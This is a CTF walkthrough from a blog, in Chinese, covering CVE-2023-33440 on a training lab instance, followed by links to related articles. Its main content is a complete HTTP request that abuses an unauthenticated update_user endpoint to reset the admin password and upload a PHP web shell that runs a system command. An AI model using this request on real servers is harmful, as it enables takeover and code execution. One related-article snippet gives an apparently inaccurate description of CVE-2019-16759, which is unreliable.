CVE-2023-33440详解

已于 2024-08-05 09:39:01 修改
阅读量176 收藏
点赞数 7
文章标签: android
于 2024-08-05 09:38:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a666666688/article/details/140918362
版权

一.访问url

http://eci-2zef9bcht3lq36hkwyoh.cloudeci1.ichunqiu.com/

二.目录扫描

http://eci-2zef9bcht3lq36hkwyoh.cloudeci1.ichunqiu.com/

三.拼接访问/login.php

四.抓包构造数据包

发给repeter

复制过去这几个位置都有空格,要删除掉,Referer和Host处修改成自己的url

POST /ajax.php?action=update_user HTTP/1.1
Host: eci-2zef9bcht3lq36hkwyoh.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://eci-2zef9bcht3lq36hkwyoh.cloudeci1.ichunqiu.com/login.php/index.php?page=report
Content-Length: 756
Content-Type: multipart/form-data; boundary=---------------------------166782539326470
Connection: close

-----------------------------166782539326470
Content-Disposition: form-data; name="id"

1
-----------------------------166782539326470
Content-Disposition: form-data; name="firstname"

Administrator
-----------------------------166782539326470
Content-Disposition: form-data; name="lastname"

a
-----------------------------166782539326470
Content-Disposition: form-data; name="email"

admin@admin.com
-----------------------------166782539326470
Content-Disposition: form-data; name="password"

admin
-----------------------------166782539326470
Content-Disposition: form-data; name="img"; filename="php.php"
Content-Type: application/octet-stream

<?php system("cat /flag");?>
-----------------------------166782539326470--

修改后send查看返回包

五.访问shell

http://eci-2zef9bcht3lq36hkwyoh.cloudeci1.ichunqiu.com/assets/uploads/1722771600_php.php

得到flag

flag{feb43246-6b2c-45b9-8325-cc760f79244c}

成功

fasewer
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cve-2023-21839漏洞工具
04-10
**CVE-2023-21839 漏洞详解** CVE-2023-21839 是一个近期发现的安全漏洞,它主要影响的是软件或插件,具体受影响的产品可能包括但不限于操作系统、网络服务、应用程序等。这种类型的漏洞通常涉及到软件中的编程错误...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
WinRAR 0day漏洞CVE-2023-38831复现最详解
weixin_45971758的博客
08-28 1608
WinRAR 的CVE-2023-38831 漏洞被在野利用来攻击交易类的个人用户。影响版本:WinRar 版本 < 6.23。
深入分析 CVE-2023-44487 HTTP2 快速重置攻击对 Nginx 的影响
2401_84466336的博客
06-17 1214
最近安全圈公布了一个利用 HTTP/2 快速重置机制进行 DDoS 攻击的 0day 漏洞,,鉴于 HTTP/2 协议已经在 Internet 上广泛使用,所以该漏洞一经发布,在业界引起广泛关注。我们介绍过,雷池 WAF 使用 Nginx 作为其代理模式下的流量转发引擎,Nginx 已经在其官网介绍了。简单来说,Nginx 作为一款久经考验的,其本身就提供过了多种方式来缓解 DDoS 攻击。:保持默认配置 1000:保持默认配置 128需要说明的是,Nginx 1.19.7 及其之后版本是通过。
CVE-2023-38831(Winrar RCE)漏洞复现与分析
m0_55994898的博客
12-10 2212
本文对Winrar RCE漏洞(CVE-2023-38831)进行复现以及原理分析,对攻击过程进行还原,让你更直观的感受此漏洞的攻击面。对于Reverse本人并不擅长,所以此篇文章参考了很多互联网公开的对此漏洞的研究分析报告,文末标注。
CVE-2023-25194 Kafka JNDI 注入分析
蚁景网安学院
11-09 741
Apache Kafka Clients Jndi Injection漏洞描述Apache Kafka 是一个分布式数据流处理平台,可以实时发布、订阅、存储和处理数据流。Kafka Connect 是一种用于在 kafka 和其他系统之间可扩展、可靠的流式传输数据的工具。攻击者可以利用基于 SASL JAAS 配置和 SASL 协议的任意 Kafka 客户端,对 Kafka Connect wor...
[漏洞分析] CVE-2023-38545 curl“史上最严重的漏洞“分析
Breeze的博客
10-13 5166
分析与复现curl"史上最严重漏洞"CVE-2023-38545
极难利用的XSS(CVE-2023-22462)
weixin_45960266的博客
03-02 640
本身XSS的利用成本就很高,选哟用户交互才可以实现,再加上React的呈现周期,就更难利用了。
CVE-2023-22809复现(Rot5pider安全团队)
weixin_52763014的博客
04-08 2742
在复现过程中,遇到了编辑器的版本问题,vim 8.0 没办法使用那条攻击命令报错是说vim不能使用--参数,但是换了一个环境的ubuntu下的vim8.1就可以执行,具体问题不是很清楚,可以多试试。具体格式就是: xxx ALL=(ALL:ALL) sudoedit /etc/xxx 其中第一个xxx是你要进行提权的普通用户的用户名,第二是etc下的一个随意文件(这里具体哪些能行哪些不能行,我也不知道,我测试的vim和xml都可以执行,多试试)保存退出,然后 su xxx切换到用户中。
Centos7升级OpenSSH到9.3P2以解决安全问题CVE-2023-38408
02-19 785
2023年7月19日,OpenSSH团队紧急发布了补丁,针对CVE-2023-38408进行了修复,并在后续版本如9.3p2中包含了这些关键的安全更新。通过遵循以上步骤,管理员可以有效地在CentOS 7系统上升级OpenSSH至9.3p2版本,从而消除CVE-2023-38408带来的潜在风险。从可靠的源下载适用于CentOS 7的OpenSSH 9.3p2源代码包,例如来自CSDN或其他官方推荐渠道的RPM构建包。配置新的sshd服务,根据新版本特性修改。
谷歌浏览器任意文件访问漏洞(CVE-2023-4357)复现
fly夏天的博客
11-21 1402
谷歌浏览器任意文件访问漏洞(CVE-2023-4357)复现
CVE-2023-32315-Openfire-Bypass-main.zip
07-17
**Openfire 漏洞详解CVE-2023-32315** Openfire 是一款基于 Java 的开源即时通讯服务器,它允许企业构建实时、安全的通信网络。然而,任何软件都有可能存在的安全漏洞,这正是 CVE-2023-32315 的关注点。这个安全...
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
sudo-1.9.12p1,解决cve-2022-43995
11-08
**sudo-1.9.12p1版本详解** sudo的版本号结构通常表示主要版本、次要版本和补丁级别。在"1.9.12p1"中,"1"是主要版本,"9"是次要版本,"12"是补丁或修订版本,而"p1"则表示这是一个修补版,修复了上一个版本中的问题...
常见的CMS漏洞
lhdbk______的博客
08-03 538
常见的CMS漏洞
Android 发送短信功能
weixin_46107120的博客
08-04 260
输入短信内容和手机号码后,跳转到系统短信功能,然后点击发送即可。Android 发送短信功能。
Android笔试面试题AI答之广播(1)
学无止境,止于至善
08-04 485
Android广播机制提供了灵活的应用程序间和系统间的通信方式,通过不同的广播类型和注册方式,可以满足多种使用场景的需求。在使用广播时,应根据具体需求选择合适的广播类型和注册方式,并注意避免滥用广播机制导致性能问题。静态注册和动态注册各有优缺点,开发者应根据具体需求选择适合的注册方式。静态注册适用于需要长期监听广播且对广播接收时机要求不高的场景;而动态注册则适用于需要灵活控制接收器生命周期和接收条件的场景。同时,开发者还需要注意管理接收器的注册与注销过程,以避免内存泄漏和其他潜在问题。
Android】ContentProvider基本概念
最新发布
2303_79296612的博客
08-04 571
这是之前所学的东西,应用这个防止系统阻止我们监听开机广播其实用户主要在两个方面得到了保护。一方面,如果用户在低于Android 6.0系统的设备上安装该程序,会在安装界面给出提醒。这样用户就可以清楚地知晓该程序一共申请了哪些权限,从而决定是否要安装这个程序。另一方面,用户可以随时在应用程序管理界面查看任意一个程序的权限申请情况,这样该程序申请的所有权限就尽收眼底,什么都瞒不过用户的眼睛,以此保证应用程序不会出现各种滥用权限的情况。在Android 6.0系统中加入了运行时权限功能。
CVE-2019-16759漏洞原理详解
08-19
### 回答1: 这个问题我可以回答。CVE-2019-16759漏洞是LibreOffice软件中的一个漏洞,攻击者可以利用该漏洞通过特制的ODF文档文件来执行任意代码。该漏洞的原理是由于LibreOffice在处理ODF文档时,没有正确地验证文档中的宏代码,导致攻击者可以通过恶意代码来执行任意命令。该漏洞已经被修复,建议用户及时更新软件版本。 ### 回答2: CVE-2019-16759是一个存在于某个软件或系统中的安全漏洞。该漏洞具体的原理是指某个软件或系统的设计或实现过程中存在的缺陷,使得攻击者可以利用这个缺陷来执行恶意操作。 对于CVE-2019-16759漏洞而言,具体的原理可以分为以下几个方面进行解析。 首先,CVE-2019-16759漏洞可能涉及到软件或系统中的某个输入验证机制存在问题。在正常的运行过程中,软件或系统需要接受用户的输入,并对输入进行验证,以确保输入的合法性。然而,由于软件或系统在输入验证方面存在缺陷,攻击者可以发送恶意输入来绕过验证过程,从而导致安全漏洞的产生。 其次,CVE-2019-16759漏洞可能与某个安全控制机制的问题有关。安全控制机制是指软件或系统中用于限制用户权限和保护敏感数据的一系列规则和方法。然而,由于软件或系统在安全控制方面存在漏洞,攻击者可以绕过控制机制,获取未经授权的访问权限或窃取敏感数据。 第三,CVE-2019-16759漏洞可能涉及到软件或系统中的某个错误处理机制存在问题。在软件或系统的运行过程中,会出现各种错误和异常情况,需要有相应的处理机制来处理这些问题。然而,由于软件或系统在错误处理方面存在缺陷,攻击者可以利用这些错误和异常情况来执行恶意操作,进而导致安全漏洞的产生。 总之,CVE-2019-16759漏洞的原理可以归结为输入验证机制的问题、安全控制机制的问题和错误处理机制的问题等方面。攻击者可以利用这些缺陷来绕过验证、获取未经授权的权限或窃取敏感数据,从而导致软件或系统的安全性受到威胁。为了解决该漏洞,开发者或维护者需要修复相关的软件或系统,增强输入验证、安全控制和错误处理等方面的能力,确保软件或系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值